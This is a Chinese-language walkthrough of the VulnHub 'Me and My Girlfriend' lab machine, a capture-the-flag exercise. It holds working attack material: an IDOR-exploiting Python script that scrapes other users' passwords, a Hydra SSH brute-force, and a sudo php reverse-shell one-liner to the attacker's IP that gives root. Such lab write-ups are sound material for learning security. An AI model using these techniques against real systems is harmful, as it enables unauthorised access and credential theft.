vulnhub靶机 Me and My Girlfriend
靶机地址Me and My Girlfriend: 1 ~ VulnHub
目标是两个flag文件
靶机配置
下载好ova之后,使用vm打开导入,务必记得将网络适配器调成与自己kali的网段一致,一般都是nat
渗透测试
使用nmap进行扫描
└─# nmap -sV 192.168.5.137 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-04 14:42 CST
Nmap scan report for 192.168.5.137 (192.168.5.137)
Host is up (0.000077s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:A7:0D:91 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.54 seconds
发现有80端口,证明有网页,使用dirsearch爆破目录
└─# dirsearch -u "http://192.168.5.137/"
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877
Output File: /root/.dirsearch/reports/192.168.5.137/_21-09-04_14-43-40.txt
Error Log: /root/.dirsearch/logs/errors-21-09-04_14-43-40.log
Target: http://192.168.5.137/
[14:43:40] Starting:
[14:43:41] 403 - 291B - /.ht_wsr.txt
[14:43:41] 403 - 294B - /.htaccess.save
[14:43:41] 403 - 294B - /.htaccess.orig
[14:43:41] 403 - 296B - /.htaccess.sample
[14:43:41] 403 - 294B - /.htaccess.bak1
[14:43:41] 403 - 294B - /.htaccess_orig
[14:43:41] 403 - 295B - /.htaccess_extra
[14:43:41] 403 - 292B - /.htaccessBAK
[14:43:41] 403 - 292B - /.htaccessOLD
[14:43:41] 403 - 293B - /.htaccessOLD2
[14:43:41] 403 - 292B - /.htaccess_sc
[14:43:41] 403 - 284B - /.htm
[14:43:41] 403 - 285B - /.html
[14:43:41] 403 - 290B - /.htpasswds
[14:43:41] 403 - 291B - /.httr-oauth
[14:43:41] 403 - 294B - /.htpasswd_test
[14:43:41] 403 - 284B - /.php
[14:43:41] 403 - 285B - /.php3
[14:43:47] 301 - 314B - /config -> http://192.168.5.137/config/
[14:43:47] 200 - 942B - /config/
[14:43:50] 200 - 120B - /index.php
[14:43:50] 200 - 120B - /index.php/login/
[14:43:51] 301 - 312B - /misc -> http://192.168.5.137/misc/
[14:43:53] 200 - 32B - /robots.txt
[14:43:53] 403 - 293B - /server-status
[14:43:53] 403 - 294B - /server-status/
Task Completed
发现http://192.168.5.137/config/和http://192.168.5.137/misc/ 均没有什么内容。
那么访问首页
发现,可以登录和注册。那么注册一个用户名密码为qwe:qwe
的用户
登录进去后发现点击ProFile
URL为http://192.168.5.137/index.php?page=profile&user_id=12
下面的内容是自己的账号密码信息。
尝试操控user_id=12
将其改为user_id=1
那么URL为http://192.168.5.137/index.php?page=profile&user_id=1
访问发现可以平行越权,下面的内容为user_id=1
的用户的。
那么可以编写python脚本将所有用户的信息遍历出来。
vim userinfo写入如下内容
#coding:utf-8
import requests
import re
def GetUserInfo(id):
headers = {'user-agent':'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101Firefox/68.0','X-Forwarded-For':'127.0.0.1'}
#cookie 需要登录后获取后粘贴在这里,利用登录后的平行越权
cookie = {'PHPSESSID':'dgkcddpe9nm8sdl60hkf12cfc5'}
#这里192.168.5.137是靶机ip,使用get请求
r = requests.get(url="http://192.168.5.137/index.php?page=profile&user_id=%s" %id,headers=headers,cookies=cookie).text
name=re.search('id="name\"\svalue="(.*?)">',r).group(1)
username=re.search('username\"\svalue="(.*?)"',r).group(1)
password=re.search('password\"\svalue="(.*?)"',r).group(1)
return name,username,password
#手动测试获取有账号密码的区间,我这里是0~15
for i in range(0,15):
name,username,password=(GetUserInfo(str(i)))
if name:
#保存为 username:password后面可以用hydra直接当账号密码爆破
print (str(username)+":"+str(password))
使用python3 userinfo >> userssh
将用户信息写入到userssh
使用cat userssh
查看并确认内容
└─# cat userssh
eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
qwe:qwe
然后使用hydra爆破ssh
└─# hydra -C userssh ssh://192.168.5.137
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-04 13:43:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries, ~1 try per task
[DATA] attacking ssh://192.168.5.137:22/
[22][ssh] host: 192.168.5.137 login: alice password: 4lic3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-04 13:43:14
获得ssh登录口令alice:4lic3
使用ssh登录靶机
└─# ssh alice@192.168.5.137
The authenticity of host '192.168.5.137 (192.168.5.137)' can't be established.
ECDSA key fingerprint is SHA256:lE5D8AvkJqcIwHiNuI9aSnC3ohlDrhPhjDljqSDy9sY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.5.137' (ECDSA) to the list of known hosts.
alice@192.168.5.137's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ ls
alice@gfriEND:~$ whoami
alice
用find查找flag
alice@gfriEND:~$ find / -name *flag* -print 2>&1| grep -v "Permission denied"
/home/alice/.my_secret/flag1.txt
/usr/lib/perl/5.18.2/bits/waitflags.ph
····
····
····
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/module/scsi_mod/parameters/default_dev_flags
发现flag的路径为/home/alice/.my_secret/flag1.txt
使用cat查看flag
alice@gfriEND:~$ cat /home/alice/.my_secret/flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
查看sudo权限
alice@gfriEND:~$ sudo -l
Matching Defaults entries for alice on gfriEND:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on gfriEND:
(root) NOPASSWD: /usr/bin/php
发现php命令可以用来提权
另开一个终端进行监听
nc -lvnp 9000
然后使用php进行反弹shell
sudo php -r '$sock=fsockopen("192.168.5.129",9000);exec("/bin/bash -i <&3 >&3 2>&3");'
获取一个root的shell
─# nc -lvnp 9000
listening on [any] 9000 ...
connect to [192.168.5.129] from (UNKNOWN) [192.168.5.137] 55444
root@gfriEND:~# id
id
uid=0(root) gid=0(root) groups=0(root)
找flag
root@gfriEND:~# find / -name *flag*
find / -name *flag*
/root/flag2.txt
/home/alice/.my_secret/flag1.txt
/usr/lib/perl/5.18.2/bits/waitflags.ph
/usr/src/linux-headers-4.4.0-142-generic/include/config/zone/dma/flag.h
/usr/src/linux-headers-4.4.0-142-generic/include/config/trace/irqflags
···
···
···
/sys/devices/platform/serial8250/tty/ttyS26/flags
/sys/devices/platform/serial8250/tty/ttyS27/flags
/sys/devices/platform/serial8250/tty/ttyS28/flags
/sys/devices/platform/serial8250/tty/ttyS29/flags
/sys/devices/platform/serial8250/tty/ttyS30/flags
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
发现flag路径为/root/flag2.txt
使用cat查看内容
root@gfriEND:~# cat /root/flag2.txt
cat /root/flag2.txt
________ __ ___________.__ ___________.__ ._.
/ _____/ _____/ |_ \__ ___/| |__ ____ \_ _____/| | _____ ____| |
/ \ ___ / _ \ __\ | | | | \_/ __ \ | __) | | \__ \ / ___\ |
\ \_\ ( <_> ) | | | | Y \ ___/ | \ | |__/ __ \_/ /_/ >|
\______ /\____/|__| |____| |___| /\___ > \___ / |____(____ /\___ /__
\/ \/ \/ \/ \//_____/ \/
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
注意事项
普通用户使用find时候要注意权限,不然就会有大量的Permission denied
,这里使用find / -name *flag* -print 2>&1| grep -v "Permission denied"
进行查找。